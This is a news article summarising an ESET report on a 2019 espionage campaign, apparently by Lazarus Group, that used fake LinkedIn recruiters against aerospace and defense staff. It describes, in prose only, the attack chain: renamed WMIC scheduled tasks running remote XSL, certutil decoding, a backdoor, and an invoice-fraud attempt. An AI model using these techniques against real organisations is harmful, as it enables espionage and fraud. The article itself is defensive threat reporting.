Cybersecurity researchers have recently revealed a new sophisticated cyber-espionage campaign targeted at spying on key employees of aerospace and military organizations in Europe and the Middle East.
According to a report released by ESET Cyber Security Company, the campaign was called “Operation In(ter)ception” and took place between September to December 2019.
The researchers reveal that the operation’s primary objective was espionage but, in one of the cases, the attackers tried to monetize access to a victim’s email account through compromising a business email.
The economic motive of the attacks, combined with similarities in the targeting and development style, have given a reason for ESET to suspect Lazarus Group, a notorious hacking organization which has been accused of operating on behalf of the Government of North Korea and financing the country’s illegal weapon and missile programs.
LinkedIn Social Engineering Tactics
According to ESET, the campaign was targeted and relied on tricks of social engineering to attract employees who worked for chosen firms. The attackers used the messaging feature of LinkedIn, and pretended to be HR managers of renowned companies in the aerospace and defense sector, including Collins Aerospace and General Dynamics.
As soon as a contact was established with the victims, the attackers snatched malicious files into the chat and masked them as information relating to an offer of employment. A RAR archive pretending to contain salary information of specific jobs would normally be sent directly through the chat or as an OneDrive link via e-mail from a fake LinkedIn persona. Once downloaded and opened, the files in the archive executed Windows’ Command Prompt utility to carry out a number of actions such as:
- Copy the Windows Management Instrumentation Command-line tool (wmic.exe) to a specific folder.
- Rename the WMIC tool into something harmless to avoid detection (for example Intel, NVidia, Skype, OneDrive and Mozilla).
- Create scheduled tasks that execute a remote XSL script via WMIC.
After the initial phase of gaining a snatch inside the targeted company, the actors behind the operation employed a custom malware-downloader that downloaded a second-stage payload – a C++ backdoor that periodically sends requests to an attacker-controlled server, performs pre-defined tasks using received commands, and exfiltrate information from the targeted company. The attackers also exploited native Windows utilities like “certutil” to decode base64-encoded payloads, as well as “Rundll32” and “regsvr32” to run their custom malware.
In relation to the revealed information, the LinkedIn Head of Trust and Safety department, Paul Rockwell, stated that the company actively looks forward to signs of state-sponsored activity on the Platform and takes rapid action to protect its members against bad players. He also assured that the LinkedIn’s threat intelligence team removes fake accounts using information from various sources, including government agencies.
“…the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service.”, he added. “In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”
Money-extortion BEC attacks
In addition to the above-described scenario, researchers from ESET have found evidence of attackers seeking to take advantage of the compromised accounts by extracting money from other businesses. While not successful, there has been an attempt for monetization of an unpaid invoice to a different bank account, using existing email correspondence between the account holder and a client of the company. The ESET researchers reveal that, for the purpose of this fraud, the attackers registered a domain name identical to the compromised company, but in a different top-level domain, and emailed the target customer from this fake domain. The targeted customer eventually reached out the right email address of the victim with the questionable message, which thwarted the attacker’s attempt.
The researchers concluded that the study on Operation In(ter)ception once again shows just how effective spear phishing, in a combination with social engineering tactics and multistage malware, can be when it comes to jeopardizing a given target.